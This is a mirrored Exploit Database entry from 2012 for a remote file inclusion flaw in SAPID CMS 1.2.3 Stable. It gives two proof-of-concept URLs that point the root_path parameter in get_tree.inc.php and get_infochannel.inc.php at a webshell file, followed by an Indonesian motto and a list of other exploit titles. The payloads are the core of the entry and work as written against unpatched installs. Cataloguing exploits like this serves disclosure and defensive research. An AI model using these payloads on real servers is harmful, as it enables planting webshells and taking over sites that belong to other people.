SAPID 1.2.3 Stable – Remote File Inclusion

Exploit Database
15 阅读

作者： Opa Yong

日期： 2012-01-09
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/18342/

# Exploit Title: SAPID Stable (RFI)
# Google Dork: tanyakan pada dan pemula :D
# Date: January 08 2011
# Author: Opa Yong
# Software Link: http://sourceforge.net/projects/sapid/files/sapid-cms/
# Version: SAPID 1.2.3 Stable
# Tested on: Windows XP Home Edition SP2


@POC: http://127.0.1/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[webshell.txt?]
@POC: http://127.0.1/usr/extensions/get_infochannel.inc.php?root_path=[webshell.txt?]


Pesan: Jangan pernah mengaku diri anda hacker,lebih baik orang yg di sekitar anda yg mengaku anda itu adalah hacker.


Special thanks for Dan Pemula

last Exploits
SAPID 1.2.3 Stable – Remote File Inclusion的更多信息

Pulse Pro 1.7.2 – Multiple Cross-Site Scripting Vulnerabilities：
MuM MapEdit 3.2.6.0 – Multiple Vulnerabilities：
Jara 1.6 – Multiple SQL Injections / Multiple Cross-Site Scripting Vulnerabilities：
Cloupia End-to-end FlexPod Management – Directory Traversal：
PHP iReport 1.0 – Remote Html Code Injection：
CMS Openpage – ‘index.php’ SQL Injection：
Craft CMS 4.4.14 – Unauthenticated Remote Code Execution：
Intellinet NFC-30IR Camera – Multiple Vulnerabilities：